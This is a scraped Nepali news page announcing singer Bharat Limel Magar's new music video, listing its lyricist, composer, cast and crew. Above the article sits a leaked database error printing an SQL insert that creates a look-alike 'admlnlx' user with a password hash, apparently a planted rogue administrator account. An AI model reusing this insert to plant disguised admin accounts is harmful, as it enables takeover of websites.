WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BnZll1zRFXx.Dx0mpSl3dXZ3hAtoz/1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-05 12:23:41', '', 'admlnlx', 'admlnlx')

भरत लिमेल मगरको “तिम्रै मोया छ” सार्वजनिक (भिडियोसहित) – Gaule Khabar

भरत लिमेल मगरको “तिम्रै मोया छ” सार्वजनिक (भिडियोसहित)

भरत लिमेल मगरको “तिम्रै मोया छ” सार्वजनिक (भिडियोसहित)

काठमाडौ । गायक भरत लिमेल मगरको ‘तिम्रै मोया छ’ को म्युजिक भिडियो सार्वजनिक भएको छ ।

दिनेश सुवेदीको शब्द तथा करसाङ लामाको सङ्गीत रहेको उक्त गीतमा गायक मगरसँगै चर्चित गायिका अस्मिता अधिकारीको स्वर रहेको छ ।
उक्त म्युजिक भिडियोमा चर्चित नायिका रस्मिला तामाङ तथा जीवन बस्नेत, किरन मगर, राजु श्रेष्ठ, परिश्ना बस्तोला र भर्खरै सम्पन्न ‘खोटाङ प्रतिभा–२०८०’ अन्तरगत नृत्य विद्याका उपविजेता सुवास विश्वकर्माले अभिनय गरेका छन् ।

म्युजिक भिडियोकोे निर्देशन राजु श्रेष्ठ, मनोज तामाङको कोरियोग्राफी रहेको छ भने बासु नेउपानेको छाँयाङ्कन, अर्जुन खड्काले सम्पादन रहेको छ ।

रावासावा प्राज्ञिक समाज नेपालका महासचिव तथा खोटाङ कलाकार समाज काठमाडौँमा समेत आबद्ध रहेका गायक लिमेल मगरको यो सातौँ गीति सङ्ग्रह हो । उनले यसअघि मायाको आशैमा, भञ्ज्याङ र चौतारी, मनको कुरा, साहरा र तिम्लाई पाउँजस्ता गीति सङ्ग्रह बजारमा ल्याइसकेका छन् ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका